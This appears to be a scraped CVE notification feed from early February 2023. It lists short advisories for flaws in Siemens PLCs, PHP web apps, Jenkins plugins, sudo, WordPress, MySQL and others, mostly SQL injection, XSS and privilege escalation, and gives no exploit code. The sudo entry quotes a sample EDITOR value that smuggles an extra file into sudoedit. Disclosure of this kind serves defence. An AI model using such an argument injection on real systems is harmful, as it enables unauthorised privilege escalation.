🚨 CVE-2021-44694A vulnerability has been identified in SIMATIC Drive Controller family, SIMATIC ET 200SP Open Controller CPU 1515SP PC2 (incl. SIPLUS variants), SIMATIC S7-1200 CPU family (incl. SIPLUS variants), SIMATIC S7-1500 CPU 1510SP F-1 PN, SIMATIC S7-1500 CPU 1510SP-1 PN, SIMATIC S7-1500 CPU 1511-1 PN, SIMATIC S7-1500 CPU 1511-1 PN, SIMATIC S7-1500 CPU 1511C-1 PN, SIMATIC S7-1500 CPU 1511C-1 PN, SIMATIC S7-1500 CPU 1511F-1 PN, SIMATIC S7-1500 CPU 1511F-1 PN, SIMATIC S7-1500 CPU 1511T-1 PN, SIMATIC S7-1500 CPU 1511TF-1 PN, SIMATIC S7-1500 CPU 1512C-1 PN, SIMATIC S7-1500 CPU 1512C-1 PN, SIMATIC S7-1500 CPU 1512SP F-1 PN, SIMATIC S7-1500 CPU 1512SP-1 PN, SIMATIC S7-1500 CPU 1513-1 PN, SIMATIC S7-1500 CPU 1513-1 PN, SIMATIC S7-1500 CPU 1513F-1 PN, SIMATIC S7-1500 CPU 1513F-1 PN, SIMATIC S7-1500 CPU 1513R-1 PN, SIMATIC S7-1500 CPU 1515-2 PN, SIMATIC S7-1500 CPU 1515-2 PN, SIMATIC S7-1500 CPU 1515F-2 PN, SIMATIC S7-1500 CPU 1515F-2 PN, SIMATIC S7-1500 CPU 1515R-2 PN, SIMATIC S7-1500 CPU 1515T-2 PN, SIMATIC S7-1500 CPU 1515TF-2 PN, SIMATIC S7-1500 CPU 1516-3 PN/DP, SIMATIC S7-1500 CPU 1516-3 PN/DP, SIMATIC S7-1500 CPU 1516F-3 PN/DP, SIMATIC S7-1500 CPU 1516F-3 PN/DP, SIMATIC S7-1500 CPU 1516T-3 PN/DP, SIMATIC S7-1500 CPU 1516TF-3 PN/DP, SIMATIC S7-1500 CPU 1517-3 PN/DP, SIMATIC S7-1500 CPU 1517F-3 PN/DP, SIMATIC S7-1500 CPU 1517H-3 PN, SIMATIC S7-1500 CPU 1517T-3 PN/DP, SIMATIC S7-1500 CPU 1517TF-3 PN/DP, SIMATIC S7-1500 CPU 1518-4 PN/DP, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP, SIMATIC S7-1500 CPU 1518-4F PN/DP, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP, SIMATIC S7-1500 CPU 1518HF-4 PN, SIMATIC S7-1500 CPU 1518T-4 PN/DP, SIMATIC S7-1500 CPU 1518TF-4 PN/DP, SIMATIC S7-1500 CPU S7-1518-4 PN/DP ODK, SIMATIC S7-1500 CPU S7-1518F-4 PN/DP ODK, SIMATIC S7-1500 ET 200pro: CPU 1513PRO F-2 PN, SIMATIC S7-1500 ET 200pro: CPU 1513PRO-2 PN, SIMATIC S7-1500 ET 200pro: CPU 1516PRO F-2 PN, SIMATIC S7-1500 ET 200pro: CPU 1516PRO-2 PN, SIMATIC S7-1500 Software Controller, SIMATIC S7-PLCSIM Advanced, SIPLUS ET 200SP CPU 1510SP F-1 PN, SIPLUS ET 200SP CPU 1510SP F-1 PN RAIL, SIPLUS ET 200SP CPU 1510SP-1 PN, SIPLUS ET 200SP CPU 1510SP-1 PN, SIPLUS ET 200SP CPU 1510SP-1 PN RAIL, SIPLUS ET 200SP CPU 1510SP-1 PN RAIL, SIPLUS ET 200SP CPU 1512SP F-1 PN, SIPLUS ET 200SP CPU 1512SP F-1 PN, SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL, SIPLUS ET 200SP CPU 1512SP F-1 PN RAIL, SIPLUS ET 200SP CPU 1512SP-1 PN, SIPLUS ET 200SP CPU 1512SP-1 PN, SIPLUS ET 200SP CPU 1512SP-1 PN RAIL, SIPLUS ET 200SP CPU 1512SP-1 PN RAIL, SIPLUS S7-1500 CPU 1511-1 PN, SIPLUS S7-1500 CPU 1511-1 PN, SIPLUS S7-1500 CPU 1511-1 PN, SIPLUS S7-1500 CPU 1511-1 PN, SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL, SIPLUS S7-1500 CPU 1511-1 PN T1 RAIL, SIPLUS S7-1500 CPU 1511-1 PN TX RAIL, SIPLUS S7-1500 CPU 1511-1 PN TX RAIL, SIPLUS S7-1500 CPU 1511F-1 PN, SIPLUS S7-1500 CPU 1511F-1 PN, SIPLUS S7-1500 CPU 1513-1 PN, SIPLUS S7-1500 CPU 1513-1 PN, SIPLUS S7-1500 CPU 1513-1 PN, SIPLUS S7-1500 CPU 1513-1 PN, SIPLUS S7-1500 CPU 1513F-1 PN, SIPLUS S7-1500 CPU 1513F-1 PN, SIPLUS S7-1500 CPU 1515F-2 PN, SIPLUS S7-1500 CPU 1515F-2 PN, SIPLUS S7-1500 CPU 1515F-2 PN RAIL, SIPLUS S7-1500 CPU 1515F-2 PN T2 RAIL, SIPLUS S7-1500 CPU 1515R-2 PN, SIPLUS S7-1500 CPU 1515R-2 PN TX RAIL, SIPLUS S7-1500 CPU 1516-3 PN/DP, SIPLUS S7-1500 CPU 1516-3 PN/DP, SIPLUS S7-1500 CPU 1516-3 PN/DP, SIPLUS S7-1500 CPU 1516-3 PN/DP, SIPLUS S7-1500 CPU 1516-3 PN/DP RAIL, SIPLUS S7-1500 CPU 1516-3 PN/DP TX RAIL, SIPLUS S7-1500 CPU 1516F-3 PN/DP, SIPLUS S7-1500 CPU 1516F-3 PN/DP, SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL, SIPLUS S7-1500 CPU 1516F-3 PN/DP RAIL, SIPLUS S7-1500 CPU 1517H-3 PN, SIPLUS S7-1500 CPU 1518-4 PN/DP, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP, SIPLUS S7-1500 CPU 1518F-4 PN/DP, SIPLUS S7-1500 CPU 1518HF-4 PN, SIPLUS TIM 1531 IRC, TIM 1531 IRC. Affected devices don't process correctly certain special crafted packets sent to port 102/tcp, which could allow an attacker to cause a denial-of-service in the device.🎖@cveNotify |
|
| 2023-02-06 17:30:03 |
🚨 CVE-2023-0451All versions of Econolite EOS traffic control software are vulnerable to CWE-284: Improper Access Control, and lack a password requirement for gaining “READONLY” access to log files, as well as certain database and configuration files. One such file contains tables with message-digest algorithm 5 (MD5) hashes and usernames for all defined users in the control software, including administrators and technicians.🎖@cveNotify |
|
| 2023-02-06 17:30:02 |
🚨 CVE-2022-48019The components wfshbr64.sys and wfshbr32.sys in Another Eden before v3.0.20 and before v2.14.200 allows attackers to perform privilege escalation via a crafted payload.🎖@cveNotify |
|
| 2023-02-06 17:30:01 |
🚨 CVE-2023-24191Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the redirect parameter in signup.php.🎖@cveNotify |
|
| 2023-02-06 17:29:59 |
🚨 CVE-2023-24192Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the redirect parameter in login.php.🎖@cveNotify |
|
| 2023-02-06 17:29:57 |
🚨 CVE-2023-24194Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the page parameter in navbar.php.🎖@cveNotify |
|
| 2023-02-06 17:29:56 |
🚨 CVE-2023-24195Online Food Ordering System v2 was discovered to contain a cross-site scripting (XSS) vulnerability via the page parameter in index.php.🎖@cveNotify |
|
| 2023-02-06 17:29:54 |
🚨 CVE-2023-24197Online Food Ordering System v2 was discovered to contain a SQL injection vulnerability via the id parameter at view_order.php.🎖@cveNotify |
|
| 2023-02-06 17:29:51 |
🚨 CVE-2023-24198Raffle Draw System v1.0 was discovered to contain multiple SQL injection vulnerabilities at save_winner.php via the ticket_id and draw parameters.🎖@cveNotify |
|
| 2023-02-06 17:29:48 |
🚨 CVE-2023-24199Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at delete_ticket.php.🎖@cveNotify |
|
| 2023-02-06 17:29:47 |
🚨 CVE-2023-24200Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at save_ticket.php.🎖@cveNotify |
|
| 2023-02-06 17:29:45 |
🚨 CVE-2023-24201Raffle Draw System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at get_ticket.php.🎖@cveNotify |
|
| 2023-02-06 17:29:44 |
🚨 CVE-2023-24202Raffle Draw System v1.0 was discovered to contain a local file inclusion vulnerability via the page parameter in index.php.🎖@cveNotify |
|
| 2023-02-06 17:29:42 |
🚨 CVE-2023-24276TOTOlink A7100RU(V7.4cu.2313_B20191024) was discovered to contain a command injection vulnerability via the country parameter at setting/delStaticDhcpRules.🎖@cveNotify |
|
| 2023-02-06 17:29:38 |
🚨 CVE-2021-36224Western Digital My Cloud devices before OS5 have a nobody account with a blank password.🎖@cveNotify |
|
| 2023-02-06 17:29:37 |
🚨 CVE-2021-36226Western Digital My Cloud devices before OS5 do not use cryptographically signed Firmware upgrade files.🎖@cveNotify |
|
| 2023-02-06 17:29:36 |
🚨 CVE-2022-48085Softr v2.0 was discovered to contain a HTML injection vulnerability via the Work Space Name parameter.🎖@cveNotify |
|
| 2023-02-06 14:29:37 |
🚨 CVE-2014-125086A vulnerability has been found in Gimmie Plugin 1.2.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file trigger_login.php. The manipulation of the argument userid leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is fe851002d20a8d6196a5abb68bafec4102964d5b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220207.🎖@cveNotify |
|
| 2023-02-06 14:29:36 |
🚨 CVE-2017-20176A vulnerability classified as problematic was found in ciubotaru share-on-diaspora 0.7.9. This vulnerability affects unknown code of the file new_window.php. The manipulation of the argument title/url leads to cross site scripting. The attack can be initiated remotely. The name of the patch is fb6fae2f8a9b146471450b5b0281046a17d1ac8d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-220204.🎖@cveNotify |
|
| 2023-02-06 06:29:38 |
🚨 CVE-2022-25853All versions of the package semver-tags are vulnerable to Command Injection via the getGitTagsRemote function due to improper input sanitization.🎖@cveNotify |
|
| 2023-02-06 06:29:37 |
🚨 CVE-2014-125086A vulnerability has been found in Gimmie Plugin 1.2.2 and classified as critical. Affected by this vulnerability is an unknown functionality of the file trigger_login.php. The manipulation of the argument userid leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is fe851002d20a8d6196a5abb68bafec4102964d5b. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220207.🎖@cveNotify |
|
| 2023-02-06 06:29:36 |
🚨 CVE-2017-20176A vulnerability classified as problematic was found in ciubotaru share-on-diaspora 0.7.9. This vulnerability affects unknown code of the file new_window.php. The manipulation of the argument title/url leads to cross site scripting. The attack can be initiated remotely. The name of the patch is fb6fae2f8a9b146471450b5b0281046a17d1ac8d. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-220204.🎖@cveNotify |
|
| 2023-02-06 02:29:38 |
🚨 CVE-2014-125084A vulnerability, which was classified as critical, has been found in Gimmie Plugin 1.2.2. This issue affects some unknown processing of the file trigger_referral.php. The manipulation of the argument referrername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is 7194a09353dd24a274678383a4418f2fd3fce6f7. It is recommended to upgrade the affected component. The identifier VDB-220205 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-06 02:29:37 |
🚨 CVE-2014-125085A vulnerability, which was classified as critical, was found in Gimmie Plugin 1.2.2. Affected is an unknown function of the file trigger_ratethread.php. The manipulation of the argument t/postusername leads to sql injection. Upgrading to version 1.3.0 is able to address this issue. The name of the patch is f11a136e9cbd24997354965178728dc22a2aa2ed. It is recommended to upgrade the affected component. VDB-220206 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-06 02:29:36 |
🚨 CVE-2023-24038The HTML-StripScripts module through 1.06 for Perl allows _hss_attval_style ReDoS because of catastrophic backtracking for HTML content with certain style attributes.🎖@cveNotify |
|
| 2023-02-06 00:29:38 |
🚨 CVE-2022-42919Python 3.9.x before 3.9.16 and 3.10.x before 3.10.9 on Linux allows local privilege escalation in a non-default configuration. The Python multiprocessing library, when used with the forkserver start method on Linux, allows pickles to be deserialized from any user in the same machine local network namespace, which in many system configurations means any user on the same machine. Pickles can execute arbitrary code. Thus, this allows for local user privilege escalation to the user that any forkserver process is running as. Setting multiprocessing.util.abstract_sockets_supported to False is a workaround. The forkserver start method for multiprocessing is not the default start method. This issue is Linux specific because only Linux supports abstract namespace sockets. CPython before 3.9 does not make use of Linux abstract namespace sockets by default. Support for users manually specifying an abstract namespace socket was added as a bugfix in 3.7.8 and 3.8.3, but users would need to make specific uncommon API calls in order to do that in CPython before 3.9.🎖@cveNotify |
|
| 2023-02-06 00:29:37 |
🚨 CVE-2018-1311The Apache Xerces-C 3.0.0 to 3.2.3 XML parser contains a use-after-free error triggered during the scanning of external DTDs. This flaw has not been addressed in the maintained version of the library and has no current mitigation other than to disable DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable.🎖@cveNotify |
|
| 2023-02-06 00:29:36 |
🚨 CVE-2015-0252internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data.🎖@cveNotify |
|
| 2023-02-05 22:29:39 |
🚨 CVE-2017-20175A vulnerability classified as problematic has been found in DaSchTour matomo-mediawiki-extension up to 2.4.2. This affects an unknown part of the file Piwik.hooks.php of the component Username Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.4.3 is able to address this issue. The name of the patch is 681324e4f518a8af4bd1f93867074c728eb9923d. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220203.🎖@cveNotify |
|
| 2023-02-05 18:29:40 |
🚨 CVE-2021-33844A floating point exception (divide-by-zero) issue was discovered in SoX in functon startread() of wav.c file. An attacker with a crafted wav file, could cause an application to crash.🎖@cveNotify |
|
| 2023-02-05 18:29:39 |
🚨 CVE-2021-3643A flaw was found in sox 14.4.1. The lsx_adpcm_init function within libsox leads to a global-buffer-overflow. This flaw allows an attacker to input a malicious file, leading to the disclosure of sensitive information.🎖@cveNotify |
|
| 2023-02-05 18:29:37 |
🚨 CVE-2017-11358The read_samples function in hcom.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (invalid memory read and application crash) via a crafted hcom file.🎖@cveNotify |
|
| 2023-02-05 07:29:36 |
🚨 CVE-2023-22809In Sudo before 1.9.12p2, the sudoedit (aka -e) feature mishandles extra arguments passed in the user-provided environment variables (SUDO_EDITOR, VISUAL, and EDITOR), allowing a local attacker to append arbitrary entries to the list of files to process. This can lead to privilege escalation. Affected versions are 1.8.0 through 1.9.12.p1. The problem exists because a user-specified editor may contain a "--" argument that defeats a protection mechanism, e.g., an EDITOR='vim -- /path/to/extra/file' value.🎖@cveNotify |
|
| 2023-02-05 00:29:38 |
🚨 CVE-2022-45786There are issues with the AGE drivers for Golang and Python that enable SQL injections to occur. This impacts AGE for PostgreSQL 11 & AGE for PostgreSQL 12, all versions up-to-and-including 1.1.0, when using those drivers. The fix is to update to the latest Golang and Python drivers in addition to the latest version of AGE that is used for PostgreSQL 11 or PostgreSQL 12. The update of AGE will add a new function to enable parameterization of the cypher() function, which, in conjunction with the driver updates, will resolve this issue. Background (for those who want more information): After thoroughly researching this issue, we found that due to the nature of the cypher() function, it was not easy to parameterize the values passed into it. This enabled SQL injections, if the developer of the driver wasn't careful. The developer of the Golang and Pyton drivers didn't fully utilize parameterization, likely because of this, thus enabling SQL injections. The obvious fix to this issue is to use parameterization in the drivers for all PG SQL queries. However, parameterizing all PG queries is complicated by the fact that the cypher() function call itself cannot be parameterized directly, as it isn't a real function. At least, not the parameters that would take the graph name and cypher query. The reason the cypher() function cannot have those values parameterized is because the function is a placeholder and never actually runs. The cypher() function node, created by PG in the query tree, is transformed and replaced with a query tree for the actual cypher query during the analyze phase. The problem is that parameters - that would be passed in and that the cypher() function transform needs to be resolved - are only resolved in the execution phase, which is much later. Since the transform of the cypher() function needs to know the graph name and cypher query prior to execution, they can't be passed as parameters. The fix that we are testing right now, and are proposing to use, is to create a function that will be called prior to the execution of the cypher() function transform. This new function will allow values to be passed as parameters for the graph name and cypher query. As this command will be executed prior to the cypher() function transform, its values will be resolved. These values can then be cached for the immediately following cypher() function transform to use. As added features, the cached values will store the calling session's pid, for validation. And, the cypher() function transform will clear this cached information after function invocation, regardless of whether it was used. This method will allow the parameterizing of the cypher() function indirectly and provide a way to lock out SQL injection attacks.🎖@cveNotify |
|
| 2023-02-05 00:29:37 |
🚨 CVE-2023-22849An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.4 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in multiple features. Upgrade to Apache Sling App CMS >= 1.1.6🎖@cveNotify |
|
| 2023-02-04 21:29:37 |
🚨 CVE-2023-25193hb-ot-layout-gsubgpos.hh in HarfBuzz through 6.0.0 allows attackers to trigger O(n^2) growth via consecutive marks during the process of looking back for base glyphs when attaching marks.🎖@cveNotify |
|
| 2023-02-04 16:29:42 |
🚨 CVE-2023-0676Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.🎖@cveNotify |
|
| 2023-02-04 16:29:40 |
🚨 CVE-2023-0677Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to v1.5.1.🎖@cveNotify |
|
| 2023-02-04 16:29:39 |
🚨 CVE-2023-0678Improper Authorization in GitHub repository phpipam/phpipam prior to v1.5.1.🎖@cveNotify |
|
| 2023-02-04 11:29:43 |
🚨 CVE-2018-25080A vulnerability, which was classified as problematic, has been found in MobileDetect 2.8.31. This issue affects the function initLayoutType of the file examples/session_example.php of the component Example. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.8.32 is able to address this issue. The name of the patch is 31818a441b095bdc4838602dbb17b8377d1e5cce. It is recommended to upgrade the affected component. The identifier VDB-220061 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-04 11:29:42 |
🚨 CVE-2019-25101A vulnerability classified as critical has been found in OnShift TurboGears 1.0.11.10. This affects an unknown part of the file turbogears/controllers.py of the component HTTP Header Handler. The manipulation leads to http response splitting. It is possible to initiate the attack remotely. Upgrading to version 1.0.11.11 is able to address this issue. The name of the patch is f68bbaba47f4474e1da553aa51564a73e1d92a84. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220059.🎖@cveNotify |
|
| 2023-02-04 11:29:40 |
🚨 CVE-2023-0673A vulnerability classified as critical was found in SourceCodester Online Eyewear Shop 1.0. Affected by this vulnerability is an unknown functionality of the file oews/products/view_product.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-220195.🎖@cveNotify |
|
| 2023-02-04 11:29:39 |
🚨 CVE-2023-0674A vulnerability, which was classified as problematic, has been found in XXL-JOB 2.3.1. Affected by this issue is some unknown functionality of the file /user/updatePwd of the component New Password Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220196.🎖@cveNotify |
|
| 2023-02-04 11:29:38 |
🚨 CVE-2023-0675A vulnerability, which was classified as critical, was found in Calendar Event Management System 2.3.0. This affects an unknown part. The manipulation of the argument start/end leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-04 11:29:36 |
🚨 CVE-2023-0663A vulnerability was found in Calendar Event Management System 2.3.0. It has been rated as critical. This issue affects some unknown processing of the component Login Page. The manipulation of the argument name/pwd leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-220175.🎖@cveNotify |
|
| 2023-02-04 07:30:04 |
🚨 CVE-2023-24428A cross-site request forgery (CSRF) vulnerability in Jenkins Bitbucket OAuth Plugin 0.12 and earlier allows attackers to trick users into logging in to the attacker's account.🎖@cveNotify |
|
| 2023-02-04 07:30:03 |
🚨 CVE-2023-24429Jenkins Semantic Versioning Plugin 1.14 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.🎖@cveNotify |
|
| 2023-02-04 07:30:02 |
🚨 CVE-2023-24438A missing permission check in Jenkins JIRA Pipeline Steps Plugin 2.0.165.v8846cf59f3db and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-02-04 07:30:01 |
🚨 CVE-2022-48072Phicomm K2G v22.6.3.20 was discovered to contain a command injection vulnerability via the autoUpTime parameter in the automatic upgrade function.🎖@cveNotify |
|
| 2023-02-04 07:30:00 |
🚨 CVE-2022-48010LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description or Welcome-message text fields.🎖@cveNotify |
|
| 2023-02-04 07:29:56 |
🚨 CVE-2023-24430Jenkins Semantic Versioning Plugin 1.14 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.🎖@cveNotify |
|
| 2023-02-04 07:29:55 |
🚨 CVE-2023-0563A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-219717 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-04 07:29:54 |
🚨 CVE-2022-48008An arbitrary file upload vulnerability in the plugin manager of LimeSurvey v5.4.15 allows attackers to execute arbitrary code via a crafted PHP file.🎖@cveNotify |
|
| 2023-02-04 07:29:53 |
🚨 CVE-2022-48073Phicomm K2 v22.6.534.263 was discovered to store the root and admin passwords in plaintext.🎖@cveNotify |
|
| 2023-02-04 07:29:52 |
🚨 CVE-2023-0533A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected by this issue is some unknown functionality of the file admin/expense_report.php. The manipulation of the argument from_date leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-219602 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-04 07:29:47 |
🚨 CVE-2022-48007A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent.🎖@cveNotify |
|
| 2023-02-04 07:29:46 |
🚨 CVE-2023-0534A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file admin/expense_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-219603.🎖@cveNotify |
|
| 2023-02-04 07:29:45 |
🚨 CVE-2023-0562A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-219716.🎖@cveNotify |
|
| 2023-02-04 07:29:44 |
🚨 CVE-2021-39217OpenMage LTS is an e-commerce platform. Prior to versions 19.4.22 and 20.0.19, Custom Layout enabled admin users to execute arbitrary commands via block methods. Versions 19.4.22 and 20.0.19 contain patches for this issue.🎖@cveNotify |
|
| 2023-02-04 07:29:40 |
🚨 CVE-2022-44298SiteServer CMS 7.1.3 is vulnerable to SQL Injection.🎖@cveNotify |
|
| 2023-02-04 07:29:39 |
🚨 CVE-2022-48011Opencats v0.9.7 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors function.🎖@cveNotify |
|
| 2023-02-04 07:29:38 |
🚨 CVE-2022-48116AyaCMS v3.1.2 was discovered to contain a remote code execution (RCE) vulnerability via the component /admin/tpl_edit.inc.php.🎖@cveNotify |
|
| 2023-02-04 07:29:37 |
🚨 CVE-2022-48012Opencats v0.9.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /opencats/index.php?m=settings&a=ajax_tags_upd.🎖@cveNotify |
|
| 2023-02-04 07:29:36 |
🚨 CVE-2022-48013Opencats v0.9.7 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /opencats/index.php?m=calendar. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description or Title text fields.🎖@cveNotify |
|
| 2023-02-04 00:30:18 |
🚨 CVE-2019-16095Symonics libmysofa 0.7 has an invalid read in getDimension in hrtf/reader.c.🎖@cveNotify |
|
| 2023-02-04 00:30:14 |
🚨 CVE-2019-2923Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.6.45 and prior and 5.7.27 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-02-04 00:30:13 |
🚨 CVE-2019-2920Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/ODBC). Supported versions that are affected are 5.3.13 and prior and 8.0.17 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2023-02-04 00:30:12 |
🚨 CVE-2019-2924Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 5.6.45 and prior and 5.7.27 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-02-04 00:30:11 |
🚨 CVE-2020-13587An exploitable SQL injection vulnerability exists in the "forms_fields_rules/rules" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.🎖@cveNotify |
|
| 2023-02-04 00:30:09 |
🚨 CVE-2020-13592An exploitable SQL injection vulnerability exists in "global_lists/choices" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrator credentials or through cross-site request forgery.🎖@cveNotify |
|
| 2023-02-04 00:30:08 |
🚨 CVE-2019-17674WordPress before 5.2.4 is vulnerable to stored XSS (cross-site scripting) via the Customizer.🎖@cveNotify |
|
| 2023-02-04 00:30:07 |
🚨 CVE-2019-17675WordPress before 5.2.4 does not properly consider type confusion during validation of the referer in the admin pages, possibly leading to CSRF.🎖@cveNotify |
|
| 2023-02-04 00:30:06 |
🚨 CVE-2019-17672WordPress before 5.2.4 is vulnerable to a stored XSS attack to inject JavaScript into STYLE elements.🎖@cveNotify |
|
| 2023-02-04 00:30:05 |
🚨 CVE-2019-17671In WordPress before 5.2.4, unauthenticated viewing of certain content is possible because the static query property is mishandled.🎖@cveNotify |
|
| 2023-02-04 00:30:03 |
🚨 CVE-2019-16965resources/cmd.php in FusionPBX up to 4.5.7 suffers from a command injection vulnerability due to a lack of input validation, which allows authenticated administrative attackers to execute any commands on the host as www-data.🎖@cveNotify |
|
| 2023-02-04 00:30:01 |
🚨 CVE-2019-16968An issue was discovered in FusionPBX up to 4.5.7. In the file app\conference_controls\conference_control_details.php, an unsanitized id variable coming from the URL is reflected in HTML on 2 occasions, leading to XSS.🎖@cveNotify |
|
| 2023-02-04 00:30:00 |
🚨 CVE-2019-16972In FusionPBX up to 4.5.7, the file app\contacts\contact_addresses.php uses an unsanitized "id" variable coming from the URL, which is reflected in HTML, leading to XSS.🎖@cveNotify |
|
| 2023-02-04 00:29:57 |
🚨 CVE-2019-16971In FusionPBX up to 4.5.7, the file app\messages\messages_thread.php uses an unsanitized "contact_uuid" variable coming from the URL, which is reflected on 3 occasions in HTML, leading to XSS.🎖@cveNotify |
|
| 2023-02-04 00:29:56 |
🚨 CVE-2019-17669WordPress before 5.2.4 has a Server Side Request Forgery (SSRF) vulnerability because URL validation does not consider the interpretation of a name as a series of hex characters.🎖@cveNotify |
|
| 2023-02-04 00:29:55 |
🚨 CVE-2019-16990In FusionPBX up to v4.5.7, the file app/music_on_hold/music_on_hold.php uses an unsanitized "file" variable coming from the URL, which takes any pathname (base64 encoded) and allows a download of it.🎖@cveNotify |
|
| 2023-02-03 22:30:20 |
🚨 CVE-2019-4257IBM InfoSphere Information Server 11.5 and 11.7 is affected by an information disclosure vulnerability. Sensitive information in an error message may be used to conduct further attacks against the system. IBM X-Force ID: 159945.🎖@cveNotify |
|
| 2023-02-03 22:30:19 |
